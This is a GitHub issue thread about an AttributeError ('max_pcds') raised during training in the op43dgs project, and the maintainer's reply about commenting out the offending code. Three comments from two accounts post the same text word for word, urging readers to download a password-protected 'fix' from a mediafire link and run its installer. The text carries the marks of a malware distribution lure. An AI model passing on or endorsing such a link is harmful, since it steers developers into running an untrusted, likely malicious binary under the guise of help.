### ISSUE TITLE
AttributeError: 'GroupParams' object has no attribute 'max_pcds'

### ISSUE THREAD

**Issue by goometasoft** [LetianHuang/op43dgs#6]
```
windows-11 , cuda-12.1 , pytorch-2.2

python train.py ^
-s E:\AI\op43dgs ^
-m E:\AI\op43dgs\output

Loading Training Cameras [27/08 12:16:49]
Loading Test Cameras [27/08 12:16:54]
Traceback (most recent call last):
  
  File "E:\AI\A3U\240716\win_121\train.py", line 220, in <module>
    training(lp.extract(args), op.extract(args), pp.extract(args), args.test_iterations, args.save_iterations, args.checkpoint_iterations, args.start_checkpoint, args.debug_from)
  
  File "E:\AI\A3U\240716\win_121\train.py", line 35, in training
    scene = Scene(dataset, gaussians)
  
  File "E:\AI\A3U\240716\win_121\scene\__init__.py", line 106, in __init__
    if args.max_pcds > 0:

AttributeError: 'GroupParams' object has no attribute 'max_pcds'
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by goometasoft** [comment]
Can you explain it in more detail? I still don't know how to solve it.

> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

**Comment by LetianHuang** [comment]
Thank you for your feedback! Please comment out the code related to `args.max_pcds`. We've already fixed these bugs, and you can clone the latest version. If you have any further questions, feel free to ask!
